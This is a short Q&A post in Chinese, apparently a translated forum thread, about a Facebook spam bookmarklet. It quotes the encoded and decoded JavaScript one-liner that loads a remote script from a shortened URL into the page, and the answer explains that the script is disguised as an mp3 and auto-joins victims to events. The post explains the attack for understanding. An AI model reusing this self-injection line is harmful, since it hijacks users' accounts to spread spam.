所以,我刚刚在Facebook上看到这个垃圾邮件代码,用JavaScript编写,我想知道是否有人可以向我解释代码是如何工作的,并与Facebook进行交互。我不打算将其用于恶意目的,但我只是对Facebook等网站的安全性感兴趣。这是从地址栏执行的代码(我建议不要自己尝试,最后可能会遇到一些恼火的朋友)。
javascript: (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BM ath.random()%2Cb.body.appendChild(a)%3Bvoid(0)
答案 0 :(得分:3)
在此处查看,链接是网址编码。:
http://meyerweb.com/eric/tools/dencoder/
的javascript:
a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0)
从我看到的内容:将此url加载为脚本并将其添加到当前页面。
修改 加载的脚本放在此网址:http://www.raxarstudios.com/x/audiotrack2.mp3
它被伪装成一首mp3歌曲,但它只是javascript:http://pastebin.com/RVmNVtt9 我很快就瞥了一眼,它显然使用了一些沉重的ajax来添加事件并加入你的事件。